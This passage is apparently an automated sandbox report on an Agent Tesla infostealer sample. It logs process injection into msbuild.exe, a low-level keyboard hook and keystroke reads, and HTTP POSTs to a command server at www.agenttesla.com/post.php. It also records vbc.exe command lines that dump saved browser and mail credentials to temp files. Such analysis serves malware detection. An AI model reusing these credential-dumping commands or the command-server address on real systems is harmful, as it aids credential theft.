Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dwmapi.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\bc09ad2d49d8535371845cd7532f9271\System.Configuration.ni.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasapi32.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasman.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rtutils.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\mswsock.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\wshtcpip.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\wship6.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\winhttp.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\webio.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IPHLPAPI.DLL, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\WINNSI.DLL, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dhcpcsvc6.DLL, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dhcpcsvc.DLL, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\credssp.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CFGMGR32.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\DNSAPI.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasadhlp.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\fwpuclnt.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\shfolder.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 3
Fn
Get Address c:\windows\syswow64\advapi32.dll function = DuplicateTokenEx, address_out = 0x74d4ca24 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = ResetSecurity, address_out = 0x6a311944 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = SetSecurity, address_out = 0x6a311986 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = BlessIWbemServices, address_out = 0x6a3119cc True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = BlessIWbemServicesObject, address_out = 0x6a311a1e True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetPropertyHandle, address_out = 0x6a311a70 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = WritePropertyValue, address_out = 0x6a311a89 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = Clone, address_out = 0x6a311aa2 True 2
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = VerifyClientKey, address_out = 0x6a312270 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetQualifierSet, address_out = 0x6a311d73 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = Get, address_out = 0x6a311b96 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = Put, address_out = 0x6a311b7a True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = Delete, address_out = 0x6a311bb5 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetNames, address_out = 0x6a311bc8 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = BeginEnumeration, address_out = 0x6a311be4 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = Next, address_out = 0x6a311bf7 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = EndEnumeration, address_out = 0x6a311c16 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetPropertyQualifierSet, address_out = 0x6a311c26 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetObjectText, address_out = 0x6a311c3c True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = SpawnDerivedClass, address_out = 0x6a311c52 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = SpawnInstance, address_out = 0x6a311c68 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = CompareTo, address_out = 0x6a311c7e True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetPropertyOrigin, address_out = 0x6a311c94 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = InheritsFrom, address_out = 0x6a311caa True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetMethod, address_out = 0x6a311cbd True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = PutMethod, address_out = 0x6a311cd9 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = DeleteMethod, address_out = 0x6a311cf5 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = BeginMethodEnumeration, address_out = 0x6a311d08 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = NextMethod, address_out = 0x6a311d1b True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = EndMethodEnumeration, address_out = 0x6a311d37 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetMethodQualifierSet, address_out = 0x6a311d47 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetMethodOrigin, address_out = 0x6a311d5d True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = QualifierSet_Get, address_out = 0x6a311d86 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = QualifierSet_Put, address_out = 0x6a311da2 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = QualifierSet_Delete, address_out = 0x6a311dbb True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = QualifierSet_GetNames, address_out = 0x6a311dce True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = QualifierSet_BeginEnumeration, address_out = 0x6a311de4 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = QualifierSet_Next, address_out = 0x6a311df7 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = QualifierSet_EndEnumeration, address_out = 0x6a311e13 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetCurrentApartmentType, address_out = 0x6a311d73 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetDemultiplexedStub, address_out = 0x6a3118fd True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = CreateInstanceEnumWmi, address_out = 0x6a311580 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = CreateClassEnumWmi, address_out = 0x6a3115f6 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = ExecQueryWmi, address_out = 0x6a31169e True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = ExecNotificationQueryWmi, address_out = 0x6a311717 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = PutInstanceWmi, address_out = 0x6a311790 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = PutClassWmi, address_out = 0x6a311810 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = CloneEnumWbemClassObject, address_out = 0x6a311890 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = ConnectServerWmi, address_out = 0x6a3124b7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x771625dd True 1
Fn
User (2)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
Fn
Window (6)
»
Operation Window Name Additional Information Success Count Logfile
Create - class_name = WindowsForms10.Window.0.app.0.33c0d9d, wndproc_parameter = 0 True 1
Fn
Create - class_name = WindowsForms10.Window.8.app.0.33c0d9d, wndproc_parameter = 0 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.0.app.0.33c0d9d, index = -4, new_long = 1997940189 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.0.app.0.33c0d9d, index = -4, new_long = 34804490 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.8.app.0.33c0d9d, index = -4, new_long = 1997940189 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.8.app.0.33c0d9d, index = -4, new_long = 34805690 True 1
Fn
Keyboard (82)
»
Operation Additional Information Success Count Logfile
Get Info type = KB_LOCALE_ID, os_tid = 1120, result_out = 67699721 True 2
Fn
Read result_out = 1 True 2
Fn
Read virtual_key_code = VK_SHIFT, result_out = 0 True 24
Fn
Read virtual_key_code = VK_CONTROL, result_out = 0 True 24
Fn
Read virtual_key_code = VK_MENU, result_out = 0 True 9
Fn
Read virtual_key_code = VK_CAPITAL, result_out = 0 True 6
Fn
Read virtual_key_code = VK_MENU, result_out = -127 True 9
Fn
Read virtual_key_code = VK_MENU, result_out = 1 True 6
Fn
System (64)
»
Operation Additional Information Success Count Logfile
Get foreground window - True 17
Fn
Get window text window_text = 2550884 True 10
Fn
Get window text window_text = 2550884 False 5
Fn
Get Computer Name result_out = XDUWTFONO True 2
Fn
Get Time type = System Time, time = 2019-07-22 00:25:10 (UTC) True 1
Fn
Get Time type = System Time, time = 2019-07-22 00:25:11 (UTC) True 1
Fn
Get Time type = System Time, time = 2019-07-22 00:25:12 (UTC) True 1
Fn
Get Time type = System Time, time = 2019-07-22 00:25:13 (UTC) True 1
Fn
Get Time type = System Time, time = 2019-07-22 00:25:14 (UTC) True 1
Fn
Get Time type = System Time, time = 2019-07-22 00:25:15 (UTC) True 1
Fn
Get Time type = System Time, time = 2019-07-22 00:25:16 (UTC) True 1
Fn
Get Time type = System Time, time = 2019-07-22 00:25:17 (UTC) True 1
Fn
Get Time type = System Time, time = 2019-07-22 00:25:18 (UTC) True 1
Fn
Get Time type = System Time, time = 2019-07-22 00:25:19 (UTC) True 1
Fn
Get Time type = System Time, time = 2019-07-22 00:25:20 (UTC) True 1
Fn
Get Time type = System Time, time = 2019-07-22 00:25:21 (UTC) True 1
Fn
Get Time type = System Time, time = 2019-07-22 00:25:22 (UTC) True 1
Fn
Get Time type = System Time, time = 2019-07-22 00:25:23 (UTC) True 1
Fn
Get Time type = System Time, time = 2019-07-22 00:25:24 (UTC) True 1
Fn
Get Time type = System Time, time = 2019-07-22 00:25:25 (UTC) True 1
Fn
Get Time type = System Time, time = 2019-07-22 00:25:26 (UTC) True 1
Fn
Get Time type = System Time, time = 2019-07-22 00:25:27 (UTC) True 1
Fn
Get Time type = System Time, time = 2019-07-22 00:25:28 (UTC) True 1
Fn
Register Hook type = WH_KEYBOARD_LL, hookproc_address = 0x213162a True 1
Fn
Get Info type = Operating System True 6
Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Get Network Adapter Info - False 1
Fn
Get Network Adapter Info - True 1
Fn
Mutex (12)
»
Operation Additional Information Success Count Logfile
Create mutex_name = Global\.net clr networking True 10
Fn
Create mutex_name = Global\.net clr networking False 1
Fn
Open mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE True 1
Fn
Environment (26)
»
Operation Additional Information Success Count Logfile
Get Environment String name = appdata, result_out = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming True 3
Fn
Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 18
Fn
Get Environment String name = APPDATA, result_out = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming True 3
Fn
Get Environment String name = windir, result_out = C:\Windows True 2
Fn
Network Behavior
DNS (3)
»
Operation Additional Information Success Count Logfile
Resolve Name host = www.agenttesla.com, address_out = 46.166.182.114 True 1
Fn
Resolve Name host = survey-smiles.com, address_out = 127.0.0.1 True 2
Fn
TCP Sessions (4)
»
Information Value
Total Data Sent 0 bytes
Total Data Received 0 bytes
Contacted Host Count 1
Contacted Hosts 127.0.0.1
TCP Session #1
»
Information Value
Remote Address 127.0.0.1
Remote Port 80
Local Address 192.168.0.53
Local Port -
Data Sent 0 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 127.0.0.1, remote_port = 80 False 1
Fn
Close type = SOCK_STREAM True 1
Fn
TCP Session #2
»
Information Value
Remote Address 127.0.0.1
Remote Port 80
Local Address 192.168.0.53
Local Port -
Data Sent 0 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 127.0.0.1, remote_port = 80 False 1
Fn
Close type = SOCK_STREAM True 1
Fn
TCP Session #3
»
Information Value
Remote Address 127.0.0.1
Remote Port 80
Local Address 192.168.0.53
Local Port -
Data Sent 0 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 127.0.0.1, remote_port = 80 False 1
Fn
Close type = SOCK_STREAM True 1
Fn
TCP Session #4
»
Information Value
Remote Address 127.0.0.1
Remote Port 80
Local Address 192.168.0.53
Local Port -
Data Sent 0 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 127.0.0.1, remote_port = 80 False 1
Fn
Close type = SOCK_STREAM True 1
Fn
HTTP Sessions (4)
»
Information Value
Total Data Sent 1.05 KB
Total Data Received 1.43 KB
Contacted Host Count 1
Contacted Hosts 46.166.182.114
HTTP Session #1
»
Information Value
User Agent Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Server Name www.agenttesla.com
Server Port 80
Username -
Password -
Data Sent 287 bytes
Data Received 367 bytes
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) True 1
Fn
Open Connection protocol = http, server_name = www.agenttesla.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = /post.php True 1
Fn
Send HTTP Request headers = User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729), Content-Type: application/x-www-form-urlencoded, Host: www.agenttesla.com, Content-Length: 181, Expect: 100-continue, Connection: Keep-Alive, url = www.agenttesla.com/post.php True 1
Fn
Data
Read Response size = 4096, size_out = 367 True 1
Fn
Data
Close Session - True 4
Fn
HTTP Session #2
»
Information Value
User Agent Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Server Name www.agenttesla.com
Server Port 80
Username -
Password -
Data Sent 263 bytes
Data Received 367 bytes
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) True 1
Fn
Open Connection protocol = http, server_name = www.agenttesla.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = /post.php True 1
Fn
Send HTTP Request headers = User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729), Content-Type: application/x-www-form-urlencoded, Host: www.agenttesla.com, Content-Length: 227, Expect: 100-continue, url = www.agenttesla.com/post.php True 1
Fn
Data
Read Response size = 4096, size_out = 367 True 1
Fn
Data
Close Session - True 2
Fn
HTTP Session #3
»
Information Value
User Agent Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Server Name www.agenttesla.com
Server Port 80
Username -
Password -
Data Sent 263 bytes
Data Received 367 bytes
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) True 1
Fn
Open Connection protocol = http, server_name = www.agenttesla.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = /post.php True 1
Fn
Send HTTP Request headers = User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729), Content-Type: application/x-www-form-urlencoded, Host: www.agenttesla.com, Content-Length: 225, Expect: 100-continue, url = www.agenttesla.com/post.php True 1
Fn
Data
Read Response size = 4096, size_out = 367 True 1
Fn
Data
Close Session - True 2
Fn
HTTP Session #4
»
Information Value
User Agent Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Server Name www.agenttesla.com
Server Port 80
Username -
Password -
Data Sent 263 bytes
Data Received 367 bytes
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) True 1
Fn
Open Connection protocol = http, server_name = www.agenttesla.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = /post.php True 1
Fn
Send HTTP Request headers = User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729), Content-Type: application/x-www-form-urlencoded, Host: www.agenttesla.com, Content-Length: 284, Expect: 100-continue, url = www.agenttesla.com/post.php True 1
Fn
Data
Read Response size = 4096, size_out = 367 True 1
Fn
Data
Close Session - True 2
Fn
Process #4: vbc.exe
56 0
»
Information Value
ID #4
File Name c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
Command Line C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe -f C:\Users\5P5NRG~1\AppData\Local\Temp\IEPass.txt
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:55, Reason: Child Process
Unmonitor End Time: 00:00:57, Reason: Self Terminated
Monitor Duration 00:00:01
OS Process Information
»
Information Value
PID 0xbf8
Parent PID 0xb18 (c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x BFC
0x 6BC
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
buffer 0x00400000 0x00422FFF Marked Executable - 32-bit 0x0040F046, 0x00401000, ... False False
...
Injection Information
»
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Modify Control Flow #2: c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe 0xb1c os_tid = 0xbfc True 1
Fn
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\5P5NRG~1\AppData\Local\Temp\IEPass.txt 389 bytes MD5: b8ea3a8f80e92d59650fbf1e4bc84bfd
SHA1: cbeed9d5866317cabf68ab8a356094fb06d761c0
SHA256: fdaeb29c5dc8d7be90d16833ec1afadf778cefde08f5ff22b0d420fe274da0f0
SSDeep: 3:r133PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPovL1E0AN0yOAVKXRy133a:evL1NyJvVNSvrJWgOWUVFDZNJ48WUfa 		False
...
Host Behavior
File (11)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\5P5NRG~1\AppData\Local\Temp\IEPass.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Get Info STD_INPUT_HANDLE type = file_type True 1
Fn
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Fn
Get Info STD_ERROR_HANDLE type = file_type True 1
Fn
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\IEPass.txt type = file_type True 1
Fn
Open STD_INPUT_HANDLE - True 1
Fn
Open STD_OUTPUT_HANDLE - True 3
Fn
Open STD_ERROR_HANDLE - True 1
Fn
Write C:\Users\5P5NRG~1\AppData\Local\Temp\IEPass.txt size = 389 True 1
Fn
Data
Registry (4)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 - False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer value_name = svcVersion, data = 72, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer value_name = Version, data = 8.0.7601.17514, type = REG_SZ True 1
Fn
Module (32)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 1
Fn
Get Handle mscoree.dll - False 1
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x76cb4195 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x76c3d31f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x76c4ee7e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x7717441c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x7719c50e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x7719c381 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x76c4f088 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x771805d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x7719ca24 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x77150b8c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x7720fde8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x771a1e1d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x76cb4761 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x76cacd11 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x76cb424f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x76cb46b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x76cc6676 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x76cb4751 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x76cc65f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x76cb47c1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x76cb47e1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
User (1)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-22 00:25:12 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 17669373483 True 1
Fn
Get Info type = Operating System True 1
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 1
Fn
Data
Process #5: vbc.exe
226 0
»
Information Value
ID #5
File Name c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
Command Line C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:57, Reason: Child Process
Unmonitor End Time: 00:01:04, Reason: Self Terminated
Monitor Duration 00:00:06
OS Process Information
»
Information Value
PID 0x594
Parent PID 0xb18 (c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 4A4
0x 8CC
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
buffer 0x00400000 0x0041AFFF Marked Executable - 32-bit 0x00410E58, 0x0040D6E0, ... False False
...
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
